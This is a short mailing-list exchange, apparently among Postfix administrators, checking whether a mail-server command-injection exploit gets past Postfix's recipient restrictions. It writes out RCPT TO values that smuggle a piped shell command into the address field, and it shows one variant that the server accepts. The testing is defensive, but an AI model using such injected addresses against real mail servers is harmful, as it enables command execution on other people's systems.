On Thursday February 10 2011 22:26:37 Patrick Ben Koetter wrote:
> I tried the exploit and it seems that Postfix' restrictions that check for
> FQDN address and correct recipient syntax prevent the exploit from getting
> through:

> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:<root+:"|touch /tmp/foo">
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
> fully-qualified address
> RCPT TO:<root@localhost+:"|touch /tmp/foo">
> 501 5.1.3 Bad recipient address syntax

> Can anyone confirm this?

rcpt to:<root+:"|touch /tmp/foo;@example.com">
250 2.1.5 Ok


  Mark

Reply via email to